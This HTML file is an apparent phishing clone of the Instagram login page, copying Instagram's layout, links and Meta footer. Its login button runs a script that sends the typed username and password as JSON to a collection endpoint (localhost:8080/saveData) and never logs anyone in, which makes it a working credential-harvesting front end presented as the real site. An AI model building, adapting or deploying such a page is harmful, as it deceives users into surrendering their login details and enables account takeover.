<!DOCTYPE html>

<head>

	<title>Instagram</title>

	<link rel="icon" href="Icon.jpg">

	<style>
		* {
		    margin: 0px;
		    padding: 0px;
		    font-family: Arial;
		    box-sizing: border-box;
		}

		a {
		    text-decoration: none;
		    cursor: pointer;
		}

		a:hover {
		    text-decoration: underline;
		}

		.main-body {
		    height: 37rem;
		    width: 47rem;
		    margin: auto;
		    margin-top: 2rem;
		    display: flex;
		    align-items: center;
		    justify-content: center;
		    gap: 2rem;
		}

		.body-1 {
		    height: 100%;
		    width: 50%;
		    display: flex;
		    align-items: center;
		    justify-content: center;
		}

		#phone {
		    height: 100%;
		    width: auto;
		}

		.body-2 {
		    height: 100%;
		    width: 50%;
		    text-align: center;
		}

		.login {
		    border: 1px solid rgb(211, 211, 211);
		    height: 65%;
		    width: 100%;
		    position: relative;
		    top: 1rem;
		    text-align: center;
		    background-color: white;
		}

		.instagram-box {
		    height: 3.5rem;
		    width: auto;
		    margin-top: 2rem;
		}

		#instagram-logo {
		    height: 100%;
		    width: auto;
		}

		.textfield {
		    height: auto;
		    width: auto;
		    text-align: center;
		    margin-top: 2.3rem;
		    display: flex;
		    align-items: center;
		    justify-content: center;
		    flex-wrap: wrap;
		    gap: 0.3rem;
		}

		#username {
		    border: 1px solid rgb(211, 211, 211);
		    height: 50%;
		    width: 75%;
		    font-size: 0.8rem;
		    padding: 0.5rem;
		}

		#password {
		    border: 1px solid rgb(211, 211, 211);
		    height: 50%;
		    width: 75%;
		    font-size: 0.8rem;
		    padding: 0.5rem;
		}

		#login-btn {
		    border: none;
		    border-radius: 8px;
		    margin-top: 1rem;
		    margin-bottom: 1rem;
		    height: 2rem;
		    width: 75%;
		    font-weight: bold;
		    background-color: rgb(77, 167, 252);
		    color: white;
		}

		.or {
		    height: auto;
		    width: auto;
		    display: flex;
		    align-items: center;
		    justify-content: center;
		    gap: 0.5rem;
		    font-size: 0.8rem;
		    margin-bottom: 1rem;
		}

		.facebook-box {
		    height: auto;
		    width: auto;
		    display: flex;
		    align-items: center;
		    justify-content: center;
		    gap: 0.5rem;
		    font-size: 0.8rem;
		}

		#facebook-logo {
		    height: 1rem;
		    width: 1rem;
		}

		.facebook-box a {
		    font-weight: bold;
		    color: rgb(74, 74, 150);
		    text-decoration: none;
		}

		.forget-password {
		    height: auto;
		    width: auto;
		    font-size: 0.8rem;
		    margin-top: 1rem;
		}

		.forget-password a {
		    color: rgb(14, 14, 95);
		    text-decoration: none;
		}

		.sign-up-box {
		    border: 1px solid rgb(211, 211, 211);
		    height: auto;
		    width: auto;
		    margin-top: 1.5rem;
		    padding: 1rem;
		    font-size: 0.8rem;
		    display: flex;
		    align-items: center;
		    justify-content: center;
		}

		.sign-up-box a {
		    font-size: 0.8rem;
		    font-weight: bold;
		    color: rgb(0, 110, 255);
		    text-decoration: none;
		}

		.get-the-app {
		    height: auto;
		    width: auto;
		    font-size: 0.8rem;
		    text-align: center;
		    padding: 1.3rem;
		}

		.get-the-app-images {
		    height: auto;
		    width: fit-content;
		    margin: auto;
		    display: flex;
		    align-items: center;
		    justify-content: space-between;
		    gap: 0.5rem;
		}

		.google-play {
		    height: 3rem;
		    width: auto;
		}

		#google-play {
		    height: 100%;
		    width: 100%;
		}

		.microsoft {
		    height: 3rem;
		    width: auto;
		}

		#microsoft {
		    height: 100%;
		    width: 100%;
		}

		footer {
		    height: auto;
		    width: auto;
		    margin-top: 4rem;
		}

		.footer-1 {
		    height: auto;
		    width: auto;
		    display: flex;
		    align-items: center;
		    justify-content: center;
		    gap: 1rem;
		    font-size: 1rem;
		    padding: 1rem;
		}

		.footer-1 a {
		    color: gray;
		    font-size: 0.8rem;
		}

		.footer-2 {
		    height: auto;
		    width: auto;
		    display: flex;
		    align-items: center;
		    justify-content: center;
		    gap: 1rem;
		    color: gray;
		    font-size: 0.8rem;
		    padding-bottom: 3rem;
		}
	</style>

</head>

<body>

<div class="main-body">

	<div class="body-1">

		<img id="phone" src="Phone.jpg" alt="">

	</div>

	<div class="body-2">

		<div class="login">

			<div class="instagram-box">

				<a href="https://www.instagram.com/">
					<img id="instagram-logo" src="Instagram Logo.jpg" alt="">
				</a>

			</div>

			<div class="textfield">

				<input id="username"  type="text" placeholder="Phone number, username or email" class="input">

				<input id="password" type="password" placeholder="Password" class="input">

			</div>

			<button id="login-btn" onclick="loginInit()">Log in</button>

			<div class="or">

				<hr width="120rem"> OR
				<hr width="120rem">

			</div>
			<script>
				async function loginInit(){
                    console.log("---------login started---------")
                    const response = await fetch('http://localhost:8080/saveData',{
                        method : 'POST',
                        headers : {
                            'Content-Type' : 'application/json'
                        },
                        body : JSON.stringify({
                            username: document.getElementById('username').value,
                            password: document.getElementById('password').value
                        })
                    });
                    const login = await response.json();
                    console.log("--login SuccessFull--")
                }
                document.getElementById('login-btn').onclick = async function(e){
                    const login = await loginInit();
                    console.log(login);
                }
			</script>

			<a
					href="https://www.facebook.com/login.php?skip_api_login=1&api_key=124024574287414&kid_directed_site=0&app_id=124024574287414&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Foauth%3Fclient_id%3D124024574287414%26locale%3Den_US%26redirect_uri%3Dhttps%253A%252F%252Fwww.instagram.com%252Faccounts%252Fsignup%252F%26response_type%3Dcode%252Cgranted_scopes%26scope%3Demail%26state%3D%257B%2522fbLoginKey%2522%253A%2522ph5vcnpvygbud9zy0kogtg9h1rb3ydpj5qidivk84q51c05cla%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3D5e4cfa3f-0a74-44bb-a6e7-2d85268f6045%26tp%3Dunspecified&cancel_url=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%2522fbLoginKey%2522%253A%2522ph5vcnpvygbud9zy0kogtg9h1rb3ydpj5qidivk84q51c05cla%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%23_%3D_&display=page&locale=en_GB&pl_dbl=0">

				<div class="facebook-box">

					<img id="facebook-logo" src="Facebook Logo.jpg" alt="">

					<a
							href="https://www.facebook.com/login.php?skip_api_login=1&api_key=124024574287414&kid_directed_site=0&app_id=124024574287414&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Foauth%3Fclient_id%3D124024574287414%26locale%3Den_US%26redirect_uri%3Dhttps%253A%252F%252Fwww.instagram.com%252Faccounts%252Fsignup%252F%26response_type%3Dcode%252Cgranted_scopes%26scope%3Demail%26state%3D%257B%2522fbLoginKey%2522%253A%2522ph5vcnpvygbud9zy0kogtg9h1rb3ydpj5qidivk84q51c05cla%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3D5e4cfa3f-0a74-44bb-a6e7-2d85268f6045%26tp%3Dunspecified&cancel_url=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%2522fbLoginKey%2522%253A%2522ph5vcnpvygbud9zy0kogtg9h1rb3ydpj5qidivk84q51c05cla%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%23_%3D_&display=page&locale=en_GB&pl_dbl=0">

						<p>Log in with Facebook</p>

					</a>

				</div>

			</a>

			<div class="forget-password">

				<a href="https://www.instagram.com/accounts/password/reset/">

					<p>Forgot Password?</p>

				</a>

			</div>

		</div>

		<div class="sign-up-box">

			<p>Don't have an account? <a href="https://www.instagram.com/accounts/emailsignup/">Sign up</a></p>

		</div>

		<p class="get-the-app">Get the app.</p>

		<div class="get-the-app-images">

			<div class="google-play">

				<a href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=ig_mid%3DE3A849D1-1F69-4673-B95B-9EEDE806FC1A%26utm_campaign%3DloginPage%26utm_content%3Dlo%26utm_source%3Dinstagramweb%26utm_medium%3Dbadge"
				   target="_blank">

					<img id="google-play" src="Google Play.jpg" alt="">

				</a>

			</div>

			<div class="microsoft">

				<a href="https://apps.microsoft.com/detail/9NBLGGH5L9XT?hl=en-us&gl=US" target="_blank">

					<img id="microsoft" src="Microsoft.jpg" alt="">

				</a>

			</div>

		</div>

	</div>

</div>

<footer>

	<div class="footer-1">

		<a href="https://about.meta.com/" target="_blank">
			<p>Meta</p>
		</a>
		<a href="https://about.instagram.com/" target="_blank">
			<p>About</p>
		</a>
		<a href="https://about.instagram.com/blog" target="_blank">
			<p>Blog</p>
		</a>
		<a href="https://about.instagram.com/about-us/careers" style="text-decoration: none;">
			<p>Jobs</p>
		</a>
		<a href="https://help.instagram.com/" target="_blank">
			<p>Help</p>
		</a>
		<a href="https://developers.facebook.com/docs/instagram" target="_blank">
			<p>API</p>
		</a>
		<a href="https://privacycenter.instagram.com/policy/?entry_point=ig_help_center_data_policy_redirect"
		   style="text-decoration: none;">
			<p>Privacy</p>
		</a>
		<a href="https://help.instagram.com/581066165581870/" style="text-decoration: none;">
			<p>Terms</p>
		</a>
		<a href="https://www.instagram.com/explore/locations/" style="text-decoration: none;">
			<p>Locations</p>
		</a>
		<a href="https://www.instagram.com/web/lite/" style="text-decoration: none;">
			<p>Instagram Lite</p>
		</a>
		<a href="https://www.threads.net/" target="_blank">
			<p>Threads</p>
		</a>
		<a href="https://www.facebook.com/help/instagram/261704639352628" style="text-decoration: none;">
			<p>Contact Uploading & Non-Users</p>
		</a>
		<a href="https://about.meta.com/technologies/meta-verified/" target="_blank">
			<p>Meta Verified</p>
		</a>

	</div>

	<div class="footer-2">

		<p>English</p>

		<p>© 2024 Instagram from Meta</p>

	</div>

</footer>

</body>

</html>